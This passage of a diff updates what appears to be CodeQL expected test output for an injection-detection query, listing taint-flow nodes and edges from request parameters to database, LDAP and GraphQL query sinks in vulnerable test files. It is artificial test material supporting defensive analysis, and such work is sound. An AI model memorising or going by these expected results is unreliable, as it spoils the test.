semmle.label | cond | -| mongoose.js:126:28:126:31 | cond | semmle.label | cond | -| mongoose.js:127:18:127:21 | cond | semmle.label | cond | -| mongoose.js:128:22:128:25 | cond | semmle.label | cond | -| mongoose.js:129:21:129:24 | cond | semmle.label | cond | -| mongoose.js:130:16:130:26 | { _id: id } | semmle.label | { _id: id } | -| mongoose.js:130:23:130:24 | id | semmle.label | id | -| mongoose.js:133:38:133:42 | query | semmle.label | query | -| mongoose.js:136:30:136:34 | query | semmle.label | query | +| mongoose.js:90:21:90:25 | query | semmle.label | query | +| mongoose.js:97:14:97:18 | query | semmle.label | query | +| mongoose.js:99:31:99:35 | query | semmle.label | query | +| mongoose.js:101:6:101:22 | id | 
semmle.label | id | +| mongoose.js:101:11:101:22 | req.query.id | semmle.label | req.query.id | +| mongoose.js:101:25:101:45 | cond | semmle.label | cond | +| mongoose.js:101:32:101:45 | req.query.cond | semmle.label | req.query.cond | +| mongoose.js:102:22:102:25 | cond | semmle.label | cond | +| mongoose.js:103:21:103:24 | cond | semmle.label | cond | +| mongoose.js:104:21:104:24 | cond | semmle.label | cond | +| mongoose.js:105:18:105:21 | cond | semmle.label | cond | +| mongoose.js:106:22:106:25 | cond | semmle.label | cond | +| mongoose.js:107:16:107:19 | cond | semmle.label | cond | +| mongoose.js:108:19:108:22 | cond | semmle.label | cond | +| mongoose.js:109:20:109:21 | id | semmle.label | id | +| mongoose.js:110:28:110:31 | cond | semmle.label | cond | +| mongoose.js:111:28:111:31 | cond | semmle.label | cond | +| mongoose.js:112:28:112:31 | cond | semmle.label | cond | +| mongoose.js:113:18:113:21 | cond | semmle.label | cond | +| mongoose.js:114:22:114:25 | cond | semmle.label | cond | +| mongoose.js:115:21:115:24 | cond | semmle.label | cond | +| mongoose.js:116:16:116:26 | { _id: id } | semmle.label | { _id: id } | +| mongoose.js:116:23:116:24 | id | semmle.label | id | +| mongoose.js:119:38:119:42 | query | semmle.label | query | +| mongoose.js:122:30:122:34 | query | semmle.label | query | | mongooseJsonParse.js:19:11:19:20 | query | semmle.label | query | | mongooseJsonParse.js:19:19:19:20 | {} | semmle.label | {} | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | semmle.label | JSON.pa ... y.data) | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | semmle.label | JSON.pa ... ).title | | mongooseJsonParse.js:20:30:20:43 | req.query.data | semmle.label | req.query.data | -| mongooseJsonParse.js:23:19:23:23 | query | semmle.label | query | +| mongooseJsonParse.js:22:19:22:23 | query | semmle.label | query | | mongooseModelClient.js:10:7:10:32 | v | semmle.label | v | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... 
body.x) | semmle.label | JSON.pa ... body.x) | | mongooseModelClient.js:10:22:10:29 | req.body | semmle.label | req.body | @@ -237,10 +708,8 @@ nodes | pg-promise.js:22:11:22:15 | query | semmle.label | query | | pg-promise.js:30:13:30:25 | req.params.id | semmle.label | req.params.id | | pg-promise.js:34:13:34:25 | req.params.id | semmle.label | req.params.id | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | semmle.label | [\\n ... n\\n ] | | pg-promise.js:39:7:39:19 | req.params.id | semmle.label | req.params.id | | pg-promise.js:40:7:40:21 | req.params.name | semmle.label | req.params.name | -| pg-promise.js:41:7:41:20 | req.params.foo | semmle.label | req.params.foo | | pg-promise.js:47:11:47:23 | req.params.id | semmle.label | req.params.id | | pg-promise.js:54:11:54:23 | req.params.id | semmle.label | req.params.id | | pg-promise.js:56:14:56:29 | req.params.title | semmle.label | req.params.title | @@ -268,8 +737,8 @@ nodes | socketio.js:10:25:10:30 | handle | semmle.label | handle | | socketio.js:11:12:11:53 | `INSERT ... andle}` | semmle.label | `INSERT ... andle}` | | socketio.js:11:46:11:51 | handle | semmle.label | handle | -| tst2.js:9:27:9:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | -| tst2.js:9:66:9:78 | req.params.id | semmle.label | req.params.id | +| tst2.js:8:27:8:84 | "select ... d + "'" | semmle.label | "select ... d + "'" | +| tst2.js:8:66:8:78 | req.params.id | semmle.label | req.params.id | | tst3.js:7:7:8:55 | query1 | semmle.label | query1 | | tst3.js:8:16:8:34 | req.params.category | semmle.label | req.params.category | | tst3.js:9:14:9:19 | query1 | semmle.label | query1 | 
@@ -277,481 +746,4 @@ nodes | tst4.js:8:46:8:60 | $routeParams.id | semmle.label | $routeParams.id | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | semmle.label | 'SELECT ... d + '"' | | tst.js:10:46:10:58 | req.params.id | semmle.label | req.params.id | -edges -| graphql.js:8:11:8:28 | id | graphql.js:12:46:12:47 | id | provenance | | -| graphql.js:8:16:8:28 | req.params.id | graphql.js:8:11:8:28 | id | provenance | | -| graphql.js:12:46:12:47 | id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:27:37:27:38 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:30:39:30:40 | id | provenance | | -| graphql.js:26:11:26:28 | id | graphql.js:33:25:33:26 | id | provenance | | -| graphql.js:26:16:26:28 | req.params.id | graphql.js:26:11:26:28 | id | provenance | | -| graphql.js:27:37:27:38 | id | graphql.js:27:30:27:40 | `foo ${id}` | provenance | | -| graphql.js:30:39:30:40 | id | graphql.js:30:32:30:42 | `foo ${id}` | provenance | | -| graphql.js:33:25:33:26 | id | graphql.js:33:18:33:28 | `foo ${id}` | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:44:21:44:22 | id | provenance | | -| graphql.js:39:11:39:28 | id | graphql.js:48:51:48:52 | id | provenance | | -| graphql.js:39:16:39:28 | req.params.id | graphql.js:39:11:39:28 | id | provenance | | -| graphql.js:44:21:44:22 | id | graphql.js:44:14:44:24 | `foo ${id}` | provenance | | -| graphql.js:48:51:48:52 | id | graphql.js:48:44:48:54 | `foo ${id}` | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:56:46:56:47 | id | provenance | | -| graphql.js:55:11:55:28 | id | graphql.js:58:73:58:74 | id | provenance | | -| graphql.js:55:16:55:28 | req.params.id | graphql.js:55:11:55:28 | id | provenance | | -| graphql.js:56:46:56:47 | id | graphql.js:56:39:56:49 | `foo ${id}` | provenance | | -| graphql.js:58:73:58:74 | id | graphql.js:58:66:58:76 | `foo ${id}` | provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:75:56:75:57 | id | 
provenance | | -| graphql.js:74:9:74:25 | id | graphql.js:88:13:88:14 | id | provenance | | -| graphql.js:74:14:74:25 | req.query.id | graphql.js:74:9:74:25 | id | provenance | | -| graphql.js:75:56:75:57 | id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | provenance | | -| graphql.js:88:13:88:14 | id | graphql.js:84:14:90:8 | `{\\n ... }` | provenance | | -| graphql.js:119:11:119:28 | id | graphql.js:120:45:120:46 | id | provenance | | -| graphql.js:119:16:119:28 | req.params.id | graphql.js:119:11:119:28 | id | provenance | | -| graphql.js:120:45:120:46 | id | graphql.js:120:38:120:48 | `foo ${id}` | provenance | | -| html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:14:18:14:23 | param1 | provenance | | -| html-sanitizer.js:14:5:14:24 | param1 | html-sanitizer.js:16:54:16:59 | param1 | provenance | | -| html-sanitizer.js:14:14:14:24 | xss(param1) | html-sanitizer.js:14:5:14:24 | param1 | provenance | | -| html-sanitizer.js:14:18:14:23 | param1 | html-sanitizer.js:14:14:14:24 | xss(param1) | provenance | Config | -| html-sanitizer.js:16:54:16:59 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | provenance | | -| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:33:22:33:26 | query | provenance | | -| json-schema-validator.js:25:15:25:48 | query | json-schema-validator.js:35:18:35:22 | query | provenance | | -| json-schema-validator.js:25:23:25:48 | JSON.pa ... y.data) | json-schema-validator.js:25:15:25:48 | query | provenance | | -| json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:25:23:25:48 | JSON.pa ... 
y.data) | provenance | Config | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:55:22:55:26 | query | provenance | | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:59:22:59:26 | query | provenance | | -| json-schema-validator.js:50:15:50:48 | query | json-schema-validator.js:61:22:61:26 | query | provenance | | -| json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | json-schema-validator.js:50:15:50:48 | query | provenance | | -| json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | provenance | Config | -| koarouter.js:5:11:5:33 | version | koarouter.js:14:38:14:44 | version | provenance | | -| koarouter.js:5:13:5:19 | version | koarouter.js:5:11:5:33 | version | provenance | | -| koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | koarouter.js:17:52:17:61 | conditions [ArrayElement] | provenance | | -| koarouter.js:14:25:14:46 | `versio ... rsion}` | koarouter.js:14:9:14:18 | [post update] conditions [ArrayElement] | provenance | | -| koarouter.js:14:38:14:44 | version | koarouter.js:14:25:14:46 | `versio ... rsion}` | provenance | | -| koarouter.js:17:52:17:61 | conditions [ArrayElement] | koarouter.js:17:52:17:75 | conditi ... and ') | provenance | | -| koarouter.js:17:52:17:75 | conditi ... and ') | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | provenance | | -| ldap.js:20:7:20:34 | q | ldap.js:22:18:22:18 | q | provenance | | -| ldap.js:20:11:20:34 | url.par ... , true) | ldap.js:20:7:20:34 | q | provenance | | -| ldap.js:20:21:20:27 | req.url | ldap.js:20:11:20:34 | url.par ... 
, true) | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:25:24:25:31 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:25:46:25:53 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:32:26:32:33 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:32:48:32:55 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:64:16:64:23 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:64:38:64:45 | username | provenance | | -| ldap.js:22:7:22:33 | username | ldap.js:68:33:68:40 | username | provenance | | -| ldap.js:22:18:22:18 | q | ldap.js:22:7:22:33 | username | provenance | | -| ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | ldap.js:28:30:28:34 | opts1 | provenance | Config | -| ldap.js:25:24:25:31 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:25:46:25:53 | username | ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | ldap.js:32:5:32:61 | { filte ... e}))` } | provenance | Config | -| ldap.js:32:26:32:33 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:32:48:32:55 | username | ldap.js:32:15:32:59 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:63:9:65:3 | parsedFilter | ldap.js:66:40:66:51 | parsedFilter | provenance | | -| ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | ldap.js:63:9:65:3 | parsedFilter | provenance | | -| ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | ldap.js:63:24:65:3 | ldap.pa ... ))`\\n ) | provenance | Config | -| ldap.js:64:16:64:23 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:64:38:64:45 | username | ldap.js:64:5:64:49 | `(\|(nam ... ame}))` | provenance | | -| ldap.js:66:40:66:51 | parsedFilter | ldap.js:66:30:66:53 | { filte ... 
ilter } | provenance | Config | -| ldap.js:68:33:68:40 | username | ldap.js:68:27:68:42 | `cn=${username}` | provenance | | -| marsdb-flow-to.js:10:9:10:18 | query | marsdb-flow-to.js:14:17:14:21 | query | provenance | | -| marsdb-flow-to.js:10:17:10:18 | {} | marsdb-flow-to.js:10:9:10:18 | query | provenance | | -| marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | -| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:14:17:14:21 | query | provenance | Config | -| marsdb.js:12:9:12:18 | query | marsdb.js:16:12:16:16 | query | provenance | | -| marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | -| marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | -| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:16:12:16:16 | query | provenance | Config | -| minimongo.js:14:9:14:18 | query | minimongo.js:18:12:18:16 | query | provenance | | -| minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | -| minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | -| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:18:12:18:16 | query | provenance | Config | -| mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | -| 
mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | -| mongodb.js:13:5:13:9 | query | mongodb.js:18:16:18:20 | query | provenance | | -| mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | -| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:18:16:18:20 | query | provenance | Config | -| mongodb.js:26:11:26:32 | title | mongodb.js:32:38:32:42 | title | provenance | | -| mongodb.js:26:19:26:26 | req.body | mongodb.js:26:19:26:32 | req.body.title | provenance | Config | -| mongodb.js:26:19:26:32 | req.body.title | mongodb.js:26:11:26:32 | title | provenance | | -| mongodb.js:32:27:32:43 | JSON.parse(title) | mongodb.js:32:18:32:45 | { title ... 
itle) } | provenance | Config | -| mongodb.js:32:38:32:42 | title | mongodb.js:32:27:32:43 | JSON.parse(title) | provenance | Config | -| mongodb.js:48:11:48:20 | query | mongodb.js:49:5:49:9 | query | provenance | | -| mongodb.js:48:19:48:20 | {} | mongodb.js:48:11:48:20 | query | provenance | | -| mongodb.js:49:5:49:9 | query | mongodb.js:54:16:54:20 | query | provenance | | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:11:48:20 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:48:19:48:20 | {} | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:49:5:49:9 | query | provenance | Config | -| mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | provenance | Config | -| mongodb.js:59:8:59:17 | query | mongodb.js:60:2:60:6 | query | provenance | | -| mongodb.js:59:16:59:17 | {} | mongodb.js:59:8:59:17 | query | provenance | | -| mongodb.js:60:2:60:6 | query | mongodb.js:65:12:65:16 | query | provenance | | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:8:59:17 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:59:16:59:17 | {} | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:60:2:60:6 | query | provenance | Config | -| mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | provenance | Config | -| mongodb.js:70:7:70:25 | tag | mongodb.js:77:22:77:24 | tag | provenance | | -| mongodb.js:70:7:70:25 | tag | mongodb.js:85:20:85:22 | tag | provenance | | -| mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:70:7:70:25 | tag | provenance | | -| mongodb.js:77:22:77:24 | tag | mongodb.js:77:14:77:26 | { tags: tag } | provenance | Config | -| mongodb.js:85:20:85:22 | tag | mongodb.js:85:12:85:24 | { tags: tag } | provenance | Config | -| mongodb.js:106:9:106:18 | query | mongodb.js:107:3:107:7 | query | provenance | | -| mongodb.js:106:17:106:18 | {} | 
mongodb.js:106:9:106:18 | query | provenance | | -| mongodb.js:107:3:107:7 | query | mongodb.js:112:14:112:18 | query | provenance | | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:9:106:18 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:106:17:106:18 | {} | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:107:3:107:7 | query | provenance | Config | -| mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | provenance | Config | -| mongodb_bodySafe.js:23:11:23:20 | query | mongodb_bodySafe.js:24:5:24:9 | query | provenance | | -| mongodb_bodySafe.js:23:19:23:20 | {} | mongodb_bodySafe.js:23:11:23:20 | query | provenance | | -| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:29:16:29:20 | query | provenance | | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:11:23:20 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:19:23:20 | {} | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:24:5:24:9 | query | provenance | Config | -| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | provenance | Config | -| mongoose.js:20:8:20:17 | query | mongoose.js:21:2:21:6 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:42:19:42:23 | query | provenance | | -| 
mongoose.js:20:8:20:17 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:20:8:20:17 | query | 
mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongoose.js:20:16:20:17 | {} | mongoose.js:20:8:20:17 | query | provenance | | -| mongoose.js:21:2:21:6 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:21:16:21:23 | req.body | mongoose.js:21:16:21:29 | req.body.title | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:8:20:17 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:16:20:17 | {} | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:21:2:21:6 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:24:22:24:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:17:27:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:30:22:30:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:21:33:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:36:28:36:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:16:39:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:42:19:42:23 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:28:45:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:48:28:48:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:28:51:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:22:54:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:18:57:22 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | 
mongoose.js:60:22:60:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:21:63:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:65:32:65:36 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:27:67:31 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:8:68:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:17:71:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:72:10:72:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:8:73:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:74:7:74:11 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:16:75:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:76:12:76:16 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:77:10:77:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:81:37:81:41 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:83:47:83:51 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:85:46:85:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:87:51:87:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:89:46:89:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:92:46:92:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:94:51:94:55 | query | provenance | Config | -| 
mongoose.js:21:16:21:29 | req.body.title | mongoose.js:96:46:96:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:104:21:104:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:111:14:111:18 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:113:31:113:35 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:133:38:133:42 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:136:30:136:34 | query | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:24:21:24:27 | [query] | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:27:17:27:21 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:30:22:30:26 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:33:21:33:25 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:36:28:36:32 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:39:16:39:20 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:42:19:42:23 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:45:28:45:32 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:48:28:48:32 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:51:28:51:32 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:54:22:54:26 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:57:18:57:22 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:60:22:60:26 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:63:21:63:25 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:65:32:65:36 | query | mongoose.js:67:27:67:31 | query | provenance 
| | -| mongoose.js:67:27:67:31 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:68:8:68:12 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:71:17:71:21 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:72:10:72:14 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:73:8:73:12 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:74:7:74:11 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:75:16:75:20 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:76:12:76:16 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:77:10:77:14 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:81:37:81:41 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:82:46:82:50 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:85:46:85:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:87:51:87:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:89:46:89:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:92:46:92:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:94:51:94:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:96:46:96:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:104:21:104:25 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:111:14:111:18 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:113:31:113:35 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:123:20:123:21 | id | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:130:23:130:24 | id | provenance | | -| 
mongoose.js:115:11:115:22 | req.query.id | mongoose.js:115:6:115:22 | id | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:116:22:116:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:117:21:117:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:118:21:118:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:119:18:119:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:120:22:120:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:121:16:121:19 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:122:19:122:22 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:124:28:124:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:125:28:125:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:126:28:126:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:127:18:127:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:128:22:128:25 | cond | provenance | | -| 